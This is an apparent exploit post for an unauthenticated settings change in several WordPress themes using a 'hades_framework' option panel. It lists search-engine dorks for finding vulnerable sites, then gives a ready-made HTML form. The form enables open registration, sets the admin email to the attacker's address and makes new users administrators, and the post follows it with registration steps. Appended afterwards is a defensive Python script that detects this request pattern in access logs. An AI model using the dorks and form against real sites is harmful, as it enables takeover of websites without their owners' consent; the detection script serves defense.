WordPress Add Admin Vulnerability

Mr.X98
Dork : 
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
And there are many more vulnerable themes...

CSRF :
<form action="localhost/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email lu yang aktiv">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

If a success notification appears, the site is vulnerable; all that is left is to register using that email address:
localhost/wp-login.php?action=register 

That's all...
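For site owners, the request sequence described above (a POST to the theme's hades_framework/option_panel/ajax.php, then a visit to the registration page) can be looked for in web server access logs. The script below is an added example, not code from the original post; it assumes combined log format, and the log lines, IP addresses and the "example-theme" directory are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed sample access log (combined format); IPs are documentation ranges
# and "example-theme" is a placeholder theme directory.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2017:10:01:02 +0000] "POST /wp-content/themes/example-theme/hades_framework/option_panel/ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Aug/2017:10:01:40 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2930 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Aug/2017:10:02:11 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2930 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Aug/2017:10:03:00 +0000] "POST /wp-content/themes/example-theme/hades_framework/option_panel/ajax.php HTTP/1.1" 403 0 "-" "curl/7.50"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
PANEL_RE = re.compile(r'/hades_framework/option_panel/ajax\.php(?:\?|$)', re.I)
REGISTER_RE = re.compile(r'/wp-login\.php\?(?:.*&)?action=register', re.I)
SEVERITY_ORDER = ("high", "medium", "low")


def analyze(log_text):
    """Return (severity, ip, panel_post_timestamps) tuples, most severe first."""
    posts = defaultdict(list)      # ip -> [(timestamp, got_2xx_response)]
    registered_after = set()       # ips that opened the register page after a 2xx POST
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        if m["method"] == "POST" and PANEL_RE.search(path):
            posts[ip].append((m["ts"], m["status"].startswith("2")))
        elif REGISTER_RE.search(path) and any(ok for _, ok in posts.get(ip, [])):
            registered_after.add(ip)
    findings = []
    for ip, hits in posts.items():
        if ip in registered_after:
            severity = "high"      # 2xx on the option panel, then registration
        elif any(ok for _, ok in hits):
            severity = "medium"    # 2xx on the option panel; review site options
        else:
            severity = "low"       # every attempt was rejected (e.g. 403)
        findings.append((severity, ip, [ts for ts, _ in hits]))
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f[0]))


if __name__ == "__main__":
    for severity, ip, stamps in analyze(SAMPLE_LOG):
        print(severity, ip, stamps)
```

The two requests can come from different source addresses, so any 2xx POST to this endpoint is a reason to review the site's users_can_register, default_role and admin_email options and its list of administrator accounts.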